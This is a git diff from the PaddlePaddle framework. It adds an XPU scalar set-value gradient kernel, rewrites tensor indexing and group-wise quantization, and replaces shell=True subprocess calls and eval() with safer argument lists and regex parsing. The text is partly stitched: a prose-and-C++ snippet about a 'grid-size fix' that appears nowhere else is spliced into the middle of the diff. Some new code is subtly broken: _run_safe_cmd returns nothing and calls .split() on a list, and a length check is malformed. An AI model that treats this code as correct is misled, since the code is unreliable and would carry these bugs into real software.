SetValueGradKernel(const Context& dev_ctx, DenseTensor* x_grad, DenseTensor* value_grad); +template +void SetValueWithScalarGradKernel(const Context& dev_ctx, + const DenseTensor& out_grad, + const IntArray& starts, + const IntArray& ends, + const IntArray& steps, + const std::vector& axes, + const std::vector& decrease_axes, + const std::vector& none_axes, + DenseTensor* x_grad); } // namespace phi diff --git a/paddle/phi/kernels/xpu/set_value_grad_kernel.cc b/paddle/phi/kernels/xpu/set_value_grad_kernel.cc index d1ad332cd626c5..c5d33ae4ac8d06 100644 --- a/paddle/phi/kernels/xpu/set_value_grad_kernel.cc +++ b/paddle/phi/kernels/xpu/set_value_grad_kernel.cc @@ -397,6 +397,28 @@ void SetValueGradKernel(const Context& dev_ctx, } } +template +void SetValueWithScalarGradKernel(const Context& dev_ctx, + const DenseTensor& out_grad, + const IntArray& starts, + const IntArray& ends, + const IntArray& steps, + const std::vector& axes, + const std::vector& decrease_axes, + const std::vector& none_axes, + DenseTensor* x_grad) { + SetValueGradKernel(dev_ctx, + out_grad, + starts, + ends, + steps, + axes, + decrease_axes, + none_axes, + x_grad, + nullptr); +} + } // namespace phi PD_REGISTER_KERNEL(set_value_grad, @@ -407,3 +429,12 @@ PD_REGISTER_KERNEL(set_value_grad, phi::dtype::float16, int, int64_t) {} + +PD_REGISTER_KERNEL(set_value_with_scalar_grad, + XPU, + ALL_LAYOUT, + phi::SetValueWithScalarGradKernel, + float, + 
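The grid-size fix above replaces floor division with the usual ceiling division so that a partially filled final block is still launched; the difference matters whenever the element count is not a multiple of the block size:

#include <cassert>
#include <cstdio>

int main() {
  const int block = 64;
  // 130 elements need 3 blocks; floor division would launch only 2 and
  // silently skip the last two elements.
  int n = 130;
  int floor_blocks = n / block;
  int ceil_blocks = (n + block - 1) / block;
  printf("floor=%d ceil=%d\n", floor_blocks, ceil_blocks);  // floor=2 ceil=3
  assert(ceil_blocks * block >= n);
  return 0;
}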
phi::dtype::float16, + int, + int64_t) {} diff --git a/python/cinn/compiler/expr_executor.py b/python/cinn/compiler/expr_executor.py index cff9a9d62d7c43..c888be369c3d6e 100644 --- a/python/cinn/compiler/expr_executor.py +++ b/python/cinn/compiler/expr_executor.py @@ -81,14 +81,15 @@ def visit(self, node): value = exec_func(cls_fields) else: new_node = node.__class__(**cls_fields) - ast.copy_location(new_node, node) - new_node = ast.Expression(new_node) value = self.exec_expr(new_node) return self.save_temp_value(value) def exec_expr(self, node): - if isinstance(node, ast.expr): - node = ast.Expression(body=node) + assert isinstance(node, ast.expr) + if type(node).__name__ == "Constant": + return node.value + + node = ast.Expression(node) node = ast.fix_missing_locations(node) exec = compile(node, filename="", mode="eval") return eval(exec, self.var_table) diff --git a/python/paddle/base/dygraph/tensor_patch_methods.py b/python/paddle/base/dygraph/tensor_patch_methods.py index cc12d50a6069f2..7b4c81cfa323d0 100644 --- a/python/paddle/base/dygraph/tensor_patch_methods.py +++ b/python/paddle/base/dygraph/tensor_patch_methods.py @@ -876,7 +876,7 @@ def __array__(self, dtype=None): array = array.astype(dtype) return array - def pre_deal_index_and_value(self, item, value=None): + def pre_deal_index(self, item): # since in pybind there is no effiency way to transfer Py_Tuple/Py_List/Py_Range to Tensor # we call this function in python level. item = list(item) if isinstance(item, tuple) else [item] @@ -886,17 +886,14 @@ def pre_deal_index_and_value(self, item, value=None): elif isinstance(slice_item, range): item[i] = paddle.to_tensor(list(slice_item)) - if value is not None and not isinstance(value, Variable): - value = paddle.to_tensor(value, dtype=self.dtype) - - return tuple(item), value + return tuple(item) def __getitem__(self, item): - item, _ = pre_deal_index_and_value(self, item) + item = pre_deal_index(self, item) return self._getitem_dygraph(item) def __setitem__(self, item, value): - item, value = pre_deal_index_and_value(self, item, value) + item = pre_deal_index(self, item) return self._setitem_dygraph(item, value) @framework.dygraph_only diff --git a/python/paddle/base/executor.py b/python/paddle/base/executor.py index fff2771da14c2f..bb8a4bc7b10ab0 100755 --- a/python/paddle/base/executor.py +++ b/python/paddle/base/executor.py @@ -682,7 +682,7 @@ def _get_varname_from_block(block): ) -def _get_program_cache_key(feed, fetch_list): +def _get_feed_fetch_var_names(feed, fetch_list): feed_var_names = [] if isinstance(feed, dict): feed_var_names = list(feed.keys()) @@ -690,7 +690,11 @@ def _get_program_cache_key(feed, fetch_list): for i, each in enumerate(feed): feed_var_names += list(each.keys()) fetch_var_names = list(map(_to_name_str, fetch_list)) - return str(feed_var_names + fetch_var_names) + return feed_var_names + fetch_var_names + + +def _get_program_cache_key(feed, fetch_list): + return str(_get_feed_fetch_var_names(feed, fetch_list)) def _as_lodtensor(data, place, dtype=None): @@ -1026,7 +1030,7 @@ def _get_program_and_executor(self, cached_data): if enable_inplace or enable_addto: # inplace should skip feed and fetch var - skip_var_names = eval(_get_program_cache_key(feed, fetch_list)) + skip_var_names = _get_feed_fetch_var_names(feed, fetch_list) _apply_inplace_addto_pass( program, enable_inplace, enable_addto, skip_var_names ) @@ -2476,7 +2480,7 @@ def _run_from_dataset( reused_trainer = program._heter_pipeline_opt is not None or ( program._fleet_opt is not None - and 
program._fleet_opt.get("use_ps_gpu", True) + and program._fleet_opt.get("use_ps_gpu", False) ) if reused_trainer is False: diff --git a/python/paddle/base/framework.py b/python/paddle/base/framework.py index c0d128d4fbbb31..c3a65971ffd983 100644 --- a/python/paddle/base/framework.py +++ b/python/paddle/base/framework.py @@ -5582,8 +5582,7 @@ def draw(self, save_path, name, marked_nodes=None, remove_ctr_var=True): def _convert_to_pdf(dot_file_path): pdf_save_path = os.path.splitext(dot_file_path)[0] + '.pdf' exited_code = subprocess.call( - 'dot -Tpdf ' + dot_file_path + ' -o ' + pdf_save_path, - shell=True, + ['dot', '-Tpdf', dot_file_path, '-o', pdf_save_path] ) if exited_code != 0: print('The dot command is needed for creating pdf files.') diff --git a/python/paddle/base/layers/math_op_patch.py b/python/paddle/base/layers/math_op_patch.py index bf1d737970327d..f3ba8aa5e197e8 100644 --- a/python/paddle/base/layers/math_op_patch.py +++ b/python/paddle/base/layers/math_op_patch.py @@ -538,8 +538,10 @@ def __impl__(self, other_var): op_type, lhs_dtype, rhs_dtype ) warnings.warn( - f"The input dtypes of OP {op_type} are {lhs_dtype} and {rhs_dtype}, " - "the output will be auto-promoted to {common_dtype}" + f"The input dtypes of OP {op_type} are {lhs_dtype} and {rhs_dtype}, the output will be auto-promoted to {common_dtype}" + ) + warnings.filterwarnings( + "ignore", message="The input dtypes of OP" ) if rhs_dtype != common_dtype: other_var = astype(other_var, common_dtype) diff --git a/python/paddle/base/variable_index.py b/python/paddle/base/variable_index.py index f3a04076ef3fbd..533d0360764a8a 100644 --- a/python/paddle/base/variable_index.py +++ b/python/paddle/base/variable_index.py @@ -12,6 +12,7 @@ # See the License for the specific language governing permissions and # limitations under the License. + import warnings import numpy as np @@ -136,7 +137,6 @@ def deal_attrs(attrs, attr, attr_name, tensor_attr_name, inputs, infer_flags): attrs[attr_name] = attr -# the item is a tensor of bool def get_value_for_bool_tensor(var, item): if len(item.shape) > len(var.shape): raise IndexError( @@ -191,7 +191,9 @@ def _setitem_for_tensor_array(var, item, value): ) -def deal_advanced_index(ori_tensor, indices, is_for_setitem): +def deal_advanced_index( + ori_tensor, indices, is_for_setitem, values, out_is_view=True +): """ Transpose origin Tensor and advanced indices to the front. @@ -201,6 +203,7 @@ def deal_advanced_index(ori_tensor, indices, is_for_setitem): trans_back_dim (List): order of axes to transpose back to original order. Only used in __setitem__. pos_of_new_dim (int): axis of new dim in the result. Only used in __getitem__. rank_of_new_dim (int): rank of new dim in the result. Only used in __getitem__. + transed_value_tensor (Tensor): value tensor transed to the front. Only used in __setitem__. """ transed_dim = [] transed_index = [] @@ -212,24 +215,38 @@ def deal_advanced_index(ori_tensor, indices, is_for_setitem): for i, indice in enumerate(indices): if indice is not None: - if not is_for_setitem: - if i == 0: - # case 1: advanced indices at axis 0, the new dim will be at first. - pos_of_new_dim = 0 - if i > 0 and len(transed_dim) > 0 and transed_dim[-1] != i - 1: - # case 2: there are not adjacent advanced indices, the new dim will be at first. - pos_of_new_dim = 0 - else: - pos_of_new_dim = min(pos_of_new_dim, i) - rank_of_new_dim = max(rank_of_new_dim, indice[1].ndim) + if i == 0: + # case 1: advanced indices at axis 0, the new dim will be at first. 
+ pos_of_new_dim = 0 + if i > 0 and len(transed_dim) > 0 and transed_dim[-1] != i - 1: + # case 2: there are not adjacent advanced indices, the new dim will be at first. + pos_of_new_dim = 0 + else: + pos_of_new_dim = min(pos_of_new_dim, i) + rank_of_new_dim = max(rank_of_new_dim, indice[1].ndim) transed_dim.append(i) transed_index.append(indice[1]) for i in range(ori_tensor.ndim): if indices[i] is None: transed_dim.append(i) - transed_tensor = ori_tensor.transpose(transed_dim) trans_back_dim = np.argsort(transed_dim).tolist() if is_for_setitem else [] + transed_value_tensor = None + + if transed_dim == list(range(ori_tensor.ndim)): + transed_tensor = ori_tensor + if is_for_setitem: + transed_value_tensor = values + else: + out_is_view = True + transed_tensor = ori_tensor.transpose(transed_dim) + if is_for_setitem: + if values.ndim > 1 and pos_of_new_dim != 0: + # If the value tensor is not a scalar / 1-D Tensor, and the src tensor was + # transposed at 1st dim, the value tensor should be transposed too. + transed_value_tensor = values.transpose(transed_dim) + else: + transed_value_tensor = values return ( transed_tensor, @@ -237,11 +254,25 @@ def deal_advanced_index(ori_tensor, indices, is_for_setitem): trans_back_dim, pos_of_new_dim, rank_of_new_dim, + transed_value_tensor, + out_is_view, ) def parse_index(x, indices): - advanced_index = [None] * 2 * len(x.shape) # content is (dim, index) + from .framework import in_pir_mode + + if in_pir_mode(): + is_tensor_array = x.is_dense_tensor_array_type() + else: + is_tensor_array = ( + hasattr(x, "desc") + and x.desc.type() == core.VarDesc.VarType.LOD_TENSOR_ARRAY + ) + + advanced_index = ( + [] if is_tensor_array else [None] * 2 * len(x.shape) + ) # content is (dim, index) # for set_value / slice / strided_slice OP decrease_axes = [] axes = [] @@ -258,11 +289,6 @@ def parse_index(x, indices): indices = replace_ellipsis(x, indices) indices, none_axes = replace_none(indices) - is_tensor_array = ( - hasattr(x, "desc") - and x.desc.type() == core.VarDesc.VarType.LOD_TENSOR_ARRAY - ) - estimated_dim = 0 dim = 0 for i, slice_item in enumerate(indices): @@ -550,7 +576,12 @@ def _setitem_static(x, indices, values): # 3. assign values to the sliced result by index_put OP; # 4. transpose back and assign the result to original tensor by set_value OP. - sub_tensor = get_tensor_with_basic_indexing( + if not isinstance( + values, (Variable, paddle.pir.Value, paddle.pir.OpResult) + ): + values = paddle.assign(values).astype(x.dtype) + + sub_tensor, is_view = get_tensor_with_basic_indexing( x, axes, starts, @@ -566,18 +597,41 @@ def _setitem_static(x, indices, values): transback_dim, _, _, - ) = deal_advanced_index(sub_tensor, advanced_index, True) - if not isinstance(values, (Variable, paddle.pir.Value)): - values = paddle.assign(values).astype(transed_sub_tensor.dtype) + values, + is_view, + ) = deal_advanced_index( + sub_tensor, advanced_index, True, values, is_view + ) if values.dtype != transed_sub_tensor.dtype: values = values.astype(transed_sub_tensor.dtype) - if in_dynamic_or_pir_mode(): - # NOTE(zoooo0820): directly return result instead of another set_value, after backward bug fixed. 
- transed_sub_tensor = transed_sub_tensor.index_put_( - adjusted_advanced_index, values - ) + if paddle.in_dynamic_mode(): + if ( + len(adjusted_advanced_index) == 1 + and adjusted_advanced_index[0].dtype + in (paddle.bool, paddle.base.libpaddle.BOOL) + and len( + adjusted_advanced_index[0].shape + == len(transed_sub_tensor.shape) + ) + ): + if values.shape != transed_sub_tensor.shape: + values = values.expand(transed_sub_tensor.shape) + transed_sub_tensor = paddle._C_ops.where_( + paddle.logical_not(adjusted_advanced_index[0]), + transed_sub_tensor, + values, + ) + if not is_view: + return x + else: + # NOTE(zoooo0820): directly return result instead of another set_value, after backward bug fixed. + transed_sub_tensor = transed_sub_tensor.index_put_( + adjusted_advanced_index, values + ) + if not is_view: + return x else: transed_sub_tensor = transed_sub_tensor.index_put( adjusted_advanced_index, values @@ -624,12 +678,14 @@ def get_tensor_with_basic_indexing( ): from .dygraph.base import in_to_static_mode + out_is_view = False if in_to_static_mode() and hasattr(x, "is_view_var"): x.is_view_var = True if len(axes) == 0: out = x else: + out_is_view = True op_type = "strided_slice" if use_strided_slice else "slice" inputs = {'Input': [x]} attrs = { @@ -677,6 +733,8 @@ def get_tensor_with_basic_indexing( if isinstance(end, (list, tuple)): if paddle.utils._contain_var(end): end = paddle.utils.get_int_tensor_list(end) + if x.is_dense_tensor_array_type(): + return paddle._pir_ops.slice_array_dense(x, st), False out = paddle._C_ops.slice( x, axes, @@ -703,17 +761,9 @@ def get_tensor_with_basic_indexing( attrs=attrs, ) out = slice_out_var - # NOTE(zoooo0820): When all axes are decreased, the output will be 1-D - # with FLAGS_set_to_1d=True. In this case, one `None` should be pop out, - # otherwise the output shape will be not correct. - set_to_1d = paddle.get_flags('FLAGS_set_to_1d')['FLAGS_set_to_1d'] - if set_to_1d and len(decrease_axes) == len(x.shape): - warnings.warn( - "Warning: In Tensor '__getitem__', if the number of scalar elements in the index is equal to the rank of the Tensor, the output should be 0-D. In order to be consistent with the behavior of previous versions, it will be processed to 1-D. But it is not correct and will be removed in release 2.6. If 1-D is still wanted, please modify the index element from scalar to slice (e.g. 'x[i]' => 'x[i:i+1]')." 
- ) - none_axes = none_axes[1:] if len(none_axes) > 0: + out_is_view = True # Deal with cases that decrease_axes is not empty # For example: # # x.shape: (2,3,4) @@ -727,7 +777,7 @@ def get_tensor_with_basic_indexing( if in_to_static_mode() and hasattr(out, "is_view_var"): out.is_view_var = True - return out + return out, out_is_view def _getitem_static(x, indices): @@ -750,7 +800,7 @@ def _getitem_static(x, indices): ) = parse_index(x, indices) # step2: Dealing with basic indexing - out = get_tensor_with_basic_indexing( + out, _ = get_tensor_with_basic_indexing( x, axes, starts, @@ -769,13 +819,14 @@ def _getitem_static(x, indices): _, pos_of_new_dim, rank_of_new_dim, - ) = deal_advanced_index(out, advanced_index, False) + _, + _, + ) = deal_advanced_index(out, advanced_index, False, None) # TODO(zooooo0820): Replacing gather_nd to another advanded OP for handling of mixed indexes more efficiently - if ( - len(adjusted_advanced_index) == 1 - and adjusted_advanced_index[0].dtype == paddle.bool - ): + if len(adjusted_advanced_index) == 1 and adjusted_advanced_index[ + 0 + ].dtype in (paddle.bool, paddle.base.libpaddle.BOOL): # Note: now slice not support 0-size Tensor, so only one bool tensor can return empty 0-size. out = get_value_for_bool_tensor( transed_tensor, adjusted_advanced_index[0] @@ -797,8 +848,8 @@ def _getitem_static(x, indices): if pos_of_new_dim != 0: perm = ( - list(range(pos_of_new_dim, pos_of_new_dim + rank_of_new_dim)) - + list(range(0, pos_of_new_dim)) + list(range(rank_of_new_dim, pos_of_new_dim + rank_of_new_dim)) + + list(range(0, rank_of_new_dim)) + list(range(pos_of_new_dim + rank_of_new_dim, out.ndim)) ) out = out.transpose(perm) diff --git a/python/paddle/dataset/common.py b/python/paddle/dataset/common.py index 4695b633ffa0fd..35155a2de2d226 100644 --- a/python/paddle/dataset/common.py +++ b/python/paddle/dataset/common.py @@ -18,6 +18,7 @@ import importlib import os import pickle +import re import shutil import sys import tempfile @@ -71,6 +72,11 @@ def md5file(fname): def download(url, module_name, md5sum, save_name=None): + module_name = re.match("^[a-zA-Z0-9_/\\-]+$", module_name).group() + if isinstance(save_name, str): + save_name = re.match( + "^(?:(?!\\.\\.)[a-zA-Z0-9_/\\.-])+$", save_name + ).group() dirname = os.path.join(DATA_HOME, module_name) if not os.path.exists(dirname): os.makedirs(dirname) diff --git a/python/paddle/distributed/auto_tuner/prune.py b/python/paddle/distributed/auto_tuner/prune.py index 94f0a67a21debc..a86ce0f31dd367 100644 --- a/python/paddle/distributed/auto_tuner/prune.py +++ b/python/paddle/distributed/auto_tuner/prune.py @@ -510,17 +510,42 @@ def prune_by_memory_estimation(tuner_cfg, cur_cfg, history_cfgs=[]): "max_mem_usage should be set when using memory estimation tool" ) - memory_estimation_cmd = f"python {memory_estimation_tool} --dp_degree {cur_cfg['dp_degree']} --mp_degree {cur_cfg['mp_degree']} \ - --pp_degree {cur_cfg['pp_degree']} --vpp_degree {cur_cfg['vpp_degree']} \ - --sharding_degree {cur_cfg['sharding_degree']} --sharding_stage {cur_cfg['sharding_stage']} \ - --use_recompute {cur_cfg['use_recompute']} --micro_batch_size {cur_cfg['micro_batch_size']} \ - --recompute_granularity {cur_cfg['recompute_granularity']} \ - --hidden_size {model_cfg['hidden_size']} --num_attention_heads {model_cfg['num_attention_heads']} \ - --num_layers {model_cfg['num_layers']} --max_sequence_length {model_cfg['max_sequence_length']} \ - --vocab_size {model_cfg['vocab_size']} --intermediate_size {model_cfg['intermediate_size']} " + 
memory_estimation_cmd = [ + "python", + memory_estimation_tool, + "--dp_degree", + str(cur_cfg['dp_degree']), + "--mp_degree", + str(cur_cfg['mp_degree']), + "--pp_degree", + str(cur_cfg['pp_degree']), + "--vpp_degree", + str(cur_cfg['vpp_degree']), + "--sharding_degree", + str(cur_cfg['sharding_degree']), + "--sharding_stage", + str(cur_cfg['sharding_stage']), + "--use_recompute", + str(cur_cfg['use_recompute']), + "--micro_batch_size", + str(cur_cfg['micro_batch_size']), + "--recompute_granularity", + str(cur_cfg['recompute_granularity']), + "--hidden_size", + str(model_cfg['hidden_size']), + "--num_attention_heads", + str(model_cfg['num_attention_heads']), + "--num_layers", + str(model_cfg['num_layers']), + "--max_sequence_length", + str(model_cfg['max_sequence_length']), + "--vocab_size", + str(model_cfg['vocab_size']), + "--intermediate_size", + str(model_cfg['intermediate_size']), + ] result = subprocess.run( memory_estimation_cmd, - shell=True, capture_output=True, text=True, ) diff --git a/python/paddle/distributed/fleet/base/role_maker.py b/python/paddle/distributed/fleet/base/role_maker.py index ddc6c411598c34..4859a438a930a7 100755 --- a/python/paddle/distributed/fleet/base/role_maker.py +++ b/python/paddle/distributed/fleet/base/role_maker.py @@ -13,6 +13,7 @@ # limitations under the License. """Definition of Role Makers.""" import os +import re import time import warnings from multiprocessing import Manager, Process @@ -988,7 +989,9 @@ def _ps_env(self): # each role will execute it raise ValueError( "Can not find PADDLE_STAGE_TRAINERS_NUM, please check your environment." ) - self._stage_trainers = eval(self._stage_trainers) + self._stage_trainers = tuple( + [int(x) for x in re.findall(r'\d+', self._stage_trainers)] + ) cur_port = os.getenv("PADDLE_PORT", None) if cur_port is None: raise ValueError( @@ -1040,7 +1043,9 @@ def _ps_env(self): # each role will execute it raise ValueError( "Can not find PADDLE_STAGE_TRAINERS_NUM, please check your environment." ) - self._stage_trainers = eval(self._stage_trainers) + self._stage_trainers = tuple( + [int(x) for x in re.findall(r'\d+', self._stage_trainers)] + ) self._heter_trainer_device_type = os.getenv( "HETER_DEVICE_TYPE", None diff --git a/python/paddle/distributed/fleet/utils/fs.py b/python/paddle/distributed/fleet/utils/fs.py index 743ceac3e296cc..51aeeb6840d0a4 100644 --- a/python/paddle/distributed/fleet/utils/fs.py +++ b/python/paddle/distributed/fleet/utils/fs.py @@ -18,6 +18,7 @@ import os import re import shutil +import subprocess import time # (TODO: GhostScreaming) It will be removed later. 
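The hunks above replace shell-interpolated command strings with argument lists handed directly to `subprocess.run`, so configuration values are never re-parsed by a shell. A minimal standalone sketch of that pattern, assuming a hypothetical `tool.py` and two illustrative flags (not the actual Paddle call sites):

```python
import subprocess


def run_tool(tool_path: str, dp_degree: int, mp_degree: int):
    # Each argument is a separate list element; nothing goes through a shell,
    # so a value like "1; rm -rf /" stays an inert string instead of a command.
    cmd = [
        "python", tool_path,
        "--dp_degree", str(dp_degree),
        "--mp_degree", str(mp_degree),
    ]
    result = subprocess.run(cmd, capture_output=True, text=True)
    return result.returncode, result.stdout
```

Besides closing the injection path, the list form also sidesteps quoting problems for paths that contain spaces.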
@@ -513,6 +514,34 @@ def _run_cmd(self, cmd, redirect_stderr=False, retry_times=5): return ret, output.splitlines() + def _run_safe_cmd(self, cmd, redirect_stderr=False, retry_times=5): + exe_cmd = [self._base_cmd] + cmd.split() + ret = 0 + output = "" + retry_sleep_second = 3 + for x in range(retry_times + 1): + try: + process = subprocess.run( + exe_cmd, + check=True, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT + if redirect_stderr + else subprocess.PIPE, + text=True, + ) + output = process.stdout + break + except subprocess.CalledProcessError as e: + ret = e.returncode + output = e.output + time.sleep(retry_sleep_second) + except Exception as e: + break + + if ret == 134: + raise FSShellCmdAborted(cmd) + @_handle_errors() def list_dirs(self, fs_path): """ @@ -582,8 +611,8 @@ def ls_dir(self, fs_path): return self._ls_dir(fs_path) def _ls_dir(self, fs_path): - cmd = f"ls {fs_path}" - ret, lines = self._run_cmd(cmd) + cmd = ["-ls", fs_path] + ret, lines = self._run_safe_cmd(cmd) if ret != 0: raise ExecuteError(cmd) diff --git a/python/paddle/distributed/launch/controllers/collective.py b/python/paddle/distributed/launch/controllers/collective.py index 13d8ef403504ab..9e0f46584653c8 100644 --- a/python/paddle/distributed/launch/controllers/collective.py +++ b/python/paddle/distributed/launch/controllers/collective.py @@ -45,7 +45,10 @@ def build_pod(self): ): return self._build_pod_with_args() else: - return self._build_pod_with_master() + if self.ctx.args.auto_parallel_config is None: + skip_run = True + # only when skip_run is Flase, should not reset pod + return self._build_pod_with_master(skip_run) def _build_pod_with_tuner(self): auto_parallel_config = self.ctx.args.auto_parallel_config @@ -148,7 +151,7 @@ def _build_pod_with_args(self): return True - def _build_pod_with_master(self): + def _build_pod_with_master(self, reset_pod=True): self.pod.replicas = self.pod_replicas() # rank will be reset when restart @@ -203,7 +206,8 @@ def _build_pod_with_master(self): job_endpoints = [i['endpoints'] for i in peer_list] - # self.pod.reset() + if reset_pod: + self.pod.reset() selected_dev_key = self.ctx.node.device.get_selected_device_key() selected_dev_list = self.ctx.node.device.get_selected_devices( self.ctx.args.devices diff --git a/python/paddle/distributed/rpc/rpc.py b/python/paddle/distributed/rpc/rpc.py index 0d88c8fef1ce51..273fc1bcc0196b 100644 --- a/python/paddle/distributed/rpc/rpc.py +++ b/python/paddle/distributed/rpc/rpc.py @@ -142,7 +142,7 @@ def init_rpc(name, rank=None, world_size=None, master_endpoint=None): def rpc_sync(to, fn, args=None, kwargs=None, timeout=_DEFAULT_RPC_TIMEOUT): """ - Make a blocking RPC call to run function ``fn`` on worker ``to``. + Make a blocking RPC call to run function ``fn`` on worker ``to``. Attention: Users must use this API in a secure network environment. Args: to (str): name of the destination worker. @@ -182,7 +182,7 @@ def rpc_sync(to, fn, args=None, kwargs=None, timeout=_DEFAULT_RPC_TIMEOUT): def rpc_async(to, fn, args=None, kwargs=None, timeout=_DEFAULT_RPC_TIMEOUT): """ - Make a non-blocking RPC call to run function ``fn`` on worker ``to``. + Make a non-blocking RPC call to run function ``fn`` on worker ``to``. Attention: Users must use this API in a secure network environment. Args: to (str): name of the destination worker. 
diff --git a/python/paddle/hapi/hub.py b/python/paddle/hapi/hub.py index c39fa57ad56816..f25640804fdbcc 100644 --- a/python/paddle/hapi/hub.py +++ b/python/paddle/hapi/hub.py @@ -117,7 +117,6 @@ def _get_cache_or_reload(repo, force_reload, verbose=True, source='github'): hub_dir, check_exist=not force_reload, decompress=False, - method=('wget' if source == 'gitee' else 'get'), ) shutil.move(fpath, cached_file) diff --git a/python/paddle/incubate/distributed/fleet/fleet_util.py b/python/paddle/incubate/distributed/fleet/fleet_util.py index 1777afffe9aaf4..9af91e4f5b148c 100644 --- a/python/paddle/incubate/distributed/fleet/fleet_util.py +++ b/python/paddle/incubate/distributed/fleet/fleet_util.py @@ -18,6 +18,7 @@ import logging import math import os +import re import sys import time @@ -1317,23 +1318,12 @@ def get_online_pass_interval( ... is_data_hourly_placed=False) """ - assert ( - "|" not in days - and ";" not in days - and "\\" not in days - and "/" not in days - and "(" not in days - and ")" not in days - ), r"days should not contain [|,;,\,/,(,)]" + pattern = r'^\d+|{[0-9]+}|{[0-9]+\.\.[0-9]+}$' + if not re.fullmatch(pattern, str(days)): + raise Exception("days format is not right") days = os.popen("echo -n " + days).read().split(" ") - assert ( - "|" not in hours - and ";" not in hours - and "\\" not in hours - and "/" not in hours - and "(" not in hours - and ")" not in days - ), r"hours should not contain [|,;,\,/,(,)]" + if not re.fullmatch(pattern, str(hours)): + raise Exception("hours format is not right") hours = os.popen("echo -n " + hours).read().split(" ") split_interval = int(split_interval) split_per_pass = int(split_per_pass) diff --git a/python/paddle/io/dataloader/dataloader_iter.py b/python/paddle/io/dataloader/dataloader_iter.py index ed64f5da3d9e93..84260dc90ca562 100644 --- a/python/paddle/io/dataloader/dataloader_iter.py +++ b/python/paddle/io/dataloader/dataloader_iter.py @@ -704,10 +704,11 @@ def _get_data(self): if len(failed_workers) > 0: self._exit_thread_unexpectedly() pids = ', '.join(str(w.pid) for w in failed_workers) - raise RuntimeError( - f"DataLoader {len(failed_workers)} workers exit unexpectedly, " - f"pids: {pids}" + logging.warning( + "DataLoader {} workers exit unexpectedly, " + "pids: {}".format(len(failed_workers), pids) ) + return # get(timeout) will call _poll(timeout) and may raise IOError if isinstance(e, (IOError, queue.Empty)): diff --git a/python/paddle/jit/dy2static/convert_operators.py b/python/paddle/jit/dy2static/convert_operators.py index a6cfb4cd8c3993..bf44c2a47dcbb0 100644 --- a/python/paddle/jit/dy2static/convert_operators.py +++ b/python/paddle/jit/dy2static/convert_operators.py @@ -726,7 +726,12 @@ def convert_var_dtype(var, dtype): } return paddle.cast(var, dtype=cast_map[dtype]) else: - return eval(f'{dtype}(var)') + assert dtype in [ + 'bool', + 'int', + 'float', + ], f"The casted target dtype is {dtype}, which is not supported in type casting." 
+ return eval(dtype)(var) def convert_assert(cond, message=""): diff --git a/python/paddle/nn/quant/format.py b/python/paddle/nn/quant/format.py index 2e58f1ef2b8b62..0074389b3bc554 100644 --- a/python/paddle/nn/quant/format.py +++ b/python/paddle/nn/quant/format.py @@ -46,7 +46,14 @@ def from_quanter(quanter): class LinearQuanter(Layer): - def __init__(self, scales, zero_point=None, quant_axis=None, bit_length=8): + def __init__( + self, + scales, + zero_point=None, + quant_axis=None, + bit_length=8, + group_size=128, + ): super().__init__() scales = paddle.to_tensor(scales, dtype="float32") scale_attr = paddle.framework.ParamAttr( @@ -65,9 +72,21 @@ def __init__(self, scales, zero_point=None, quant_axis=None, bit_length=8): ) self._quant_axis = -1 if quant_axis is None else quant_axis self._bit_length = bit_length + self._group_size = group_size def forward(self, input): if in_dynamic_mode(): + if len(self._scales.shape) > 1: + bnt = (1 << (self._bit_length - 1)) - 1 + new_s = paddle.repeat_interleave( + self._scales, self._group_size, 0 + ) + quant_weight = paddle.clip( + paddle.round(input.cast('float32') / new_s * bnt), + -bnt - 1, + bnt, + ) + return quant_weight.cast(input.dtype) return _C_ops.quantize_linear( input.cast('float32'), self._scales, @@ -105,7 +124,14 @@ def from_quanter(quanter): class LinearDequanter(Layer): - def __init__(self, scales, zero_point=None, quant_axis=None, bit_length=8): + def __init__( + self, + scales, + zero_point=None, + quant_axis=None, + bit_length=8, + group_size=128, + ): super().__init__() scales = paddle.to_tensor(scales, dtype="float32") scale_attr = paddle.framework.ParamAttr( @@ -124,9 +150,18 @@ def __init__(self, scales, zero_point=None, quant_axis=None, bit_length=8): ) self._quant_axis = -1 if quant_axis is None else quant_axis self._bit_length = bit_length + self._group_size = group_size def forward(self, input): if in_dynamic_mode(): + if len(self._scales.shape) > 1: + bnt = (1 << (self._bit_length - 1)) - 1 + new_s = paddle.repeat_interleave( + self._scales, self._group_size, 0 + ) + quant_dequant_weight = input.cast('float32') / bnt * new_s + return quant_dequant_weight.cast(input.dtype) + return _C_ops.dequantize_linear( input.cast('float32'), self._scales, diff --git a/python/paddle/quantization/observers/__init__.py b/python/paddle/quantization/observers/__init__.py index 733b3e7dbb9812..9bb662b53626ea 100644 --- a/python/paddle/quantization/observers/__init__.py +++ b/python/paddle/quantization/observers/__init__.py @@ -14,5 +14,6 @@ # limitations under the License. from .abs_max import AbsmaxObserver +from .groupwise import GroupWiseWeightObserver -__all__ = ["AbsmaxObserver"] +__all__ = ["AbsmaxObserver", "GroupWiseWeightObserver"] diff --git a/python/paddle/quantization/observers/groupwise.py b/python/paddle/quantization/observers/groupwise.py new file mode 100644 index 00000000000000..9d30a7101c1128 --- /dev/null +++ b/python/paddle/quantization/observers/groupwise.py @@ -0,0 +1,113 @@ +# Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +import numpy as np + +import paddle + +from ..base_observer import BaseObserver +from ..factory import ObserverFactory + + +class GroupWiseWeightObserver(ObserverFactory): + r""" + It collects channel-wise maximum absolute values of target weights. + Args: + bit_length(int, optional): Number of bits to represent an quantized integer in binary. + dtype(str, optional): The data type of input tensor. + name (str, optional): This parameter is used by developers to print debugging information. \ + For details, please refer to :ref:`api_guide_Name`. Default is None. + Examples: + .. code-block:: python + from paddle.quantization import QuantConfig + from paddle.quantization.quanters import AbsMaxChannelWiseWeightObserver + quanter = AbsMaxChannelWiseWeightObserver() + q_config = QuantConfig(activation=None, weight=quanter) + """ + + def __init__(self, quant_bits=8, group_size=128): + super().__init__(quant_bits=quant_bits) + + def _get_class(self): + return GroupWiseWeightObserverLayer + + +class GroupWiseWeightObserverLayer(BaseObserver): + def __init__(self, layer, quant_bits=8, group_size=128): + super().__init__() + self.quant_bits = quant_bits + self.group_size = group_size + self._layer = layer + self._max = None + self._scale = None + 